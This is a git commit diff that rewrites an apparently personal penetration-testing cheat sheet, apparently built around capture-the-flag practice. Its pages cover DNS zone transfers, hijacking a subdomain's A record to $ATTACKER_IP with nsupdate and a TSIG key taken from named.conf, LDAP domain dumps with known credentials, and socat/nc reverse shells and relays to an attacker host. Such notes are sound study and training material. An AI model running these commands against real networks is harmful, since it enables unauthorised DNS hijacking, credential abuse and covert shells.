clean up and rewrite

2023-08-09 21:50:10 +02:00 · 2023-08-09 21:50:10 +02:00 · 0f1b59e80f
parent 74e0c3e76a
commit 0f1b59e80f
4 changed files with 90 additions and 34 deletions
--- a/Enumeration/:w
+++ b/Enumeration/:w
@ -0,0 +1,43 @@
+# DNS
+
+## Subdomain Enumeration
+
+* Get all the info via 
+```sh
+dig     @$TARGET_DNS $DOMAIN axfr
+drill   @$TARGET_DNS $DOMAIN axfr
+```
+
+There is also [subrake](https://github.com/hash3liZer/Subrake.git) for sudbdomain enumeration.
+A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters.
+
+## Join a Domain
+
+Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk 
+```sh
+nsupdate
+server <DNS-IP>
+update delete <sub.domain.com>
+update add <sub.domain.com> 1234 A $ATTACKER_IP
+send
+quit
+```
+Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup.
+
+### Found Secrets for Keys 
+
+Sometimes secrets can be found secret like  a key, for example in `/etc/bind/named.conf`. This secret can be used to join the domain.
+```sh
+nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
+Creating key...
+namefromtext
+keycreate
+
+server <domain>
+update add <subdomain>.<toplevel-domain>.  86400  IN A $ATTACKER_IP
+send
+```
+
+*Hint:* Copy the lines, every space counts as it has to be exactly like in the example
+
+
--- a/Enumeration/DNS.md
+++ b/Enumeration/DNS.md
@ -8,12 +8,12 @@ dig     @$TARGET_DNS $DOMAIN axfr
 drill   @$TARGET_DNS $DOMAIN axfr
 ```

-* [subrake](https://github.com/hash3liZer/Subrake.git)
-
+There is also [subrake](https://github.com/hash3liZer/Subrake.git) for sudbdomain enumeration.
+A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters.

 ## Join a Domain

-* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk 
+Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk 
 ```sh
 nsupdate
 server <DNS-IP>
@ -22,11 +22,11 @@ update add <sub.domain.com> 1234 A $ATTACKER_IP
 send
 quit
 ```
-* Check domain by querying the subdomain's A record via dig/drill/nslookup
+Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup.

 ### Found Secrets for Keys 

-If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain.
+Sometimes secrets can be found secret like  a key, for example in `/etc/bind/named.conf`. This secret can be used to join the domain.
 ```sh
 nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
 Creating key...
@ -34,10 +34,10 @@ namefromtext
 keycreate

 server <domain>
-update add mail.snoopy.htb.  86400  IN A $ATTACKER_IP
+update add <subdomain>.<toplevel-domain>.  86400  IN A $ATTACKER_IP
 send
 ```

-Copy the lines, every space counts as it has to be exactly like in the example
+*Hint*: Copy the lines, every space counts as it has to be exactly like in the example


--- a/Enumeration/LDAP.md
+++ b/Enumeration/LDAP.md
@ -2,6 +2,7 @@

 ## Get Domain

+Use the `ldapsearch` tool to receive information from an LDAP server.
 ```sh
 ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts
 ```
@ -16,8 +17,8 @@ ldapsearch -H ldap://$TARGET_IP -x -b 'DC=<DC>,DC=<ORG>' -D '<DC>\<user>' -W > o

 ## Domain Dump

-* If a set of credentials are known via
+If a set of LDAP credentials is known dump the domain via
 ```sh
 ldapdomaindump $TARGET_IP  -u '<domain>\<user>' -p '<password>' --no-json --no-grep
 ```
-* Take a look at the genreated HTML files
+The result is a set of HTML files, take a look at them.
--- a/Exploitation/Pivoting.md
+++ b/Exploitation/Pivoting.md
@ -92,37 +92,49 @@ echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:1

 ### Socat

+#### Local PortForwarding via Socat
+
+Open a local port (here 80) on a network interface
+```sh
+./socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:80
+```
+
+#### Open a reverse shell via Socat
+
 * Reverse shell on target via
-    ```sh
-    ./socat tcp-l:8000 tcp:<attacker-IP>:443 &
-    ```
-    * Attacking bind shell
-    ```sh
-    sudo nc -lvnp 443
-    ```
+```sh
+ ./socat tcp-l:8000 tcp:<attacker-IP>:443 &
+```
+* Attacking bind shell on attacker
+```sh
+sudo nc -lvnp 443
+```

-* Relay on jumpserver via
-    ```sh
-    ./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
-    ```
+#### Jumpserver via Socat

-* Quiet Port Forwarding
-    * On attacker
-    ```sh
-    socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
-    ```
-    * On relay server
-    ```sh
-    ./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
-    ```
-    * Open `localhost:8000`
+* Relay on a jumpserver via
+```sh
+./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
+```

-* Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
+#### Quiet Port Forwarding Through a Relay Server via Socat
+
+* On attacker
+```sh
+socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
+```
+* On relay server
+```sh
+./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
+```
+__Notes__: Open `localhost:8000` on the attacker's browser or curl it afterwards. Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
+
+#### Forward Local Port via Socat

 * In need of a Download on target, expose a port on the attacker via relay
-    ```sh
-    socat tcp-l:80,fork tcp:$ATTACKER_IP:80
-    ```
+```sh
+socat tcp-l:80,fork tcp:$ATTACKER_IP:80
+```

 ### Chisel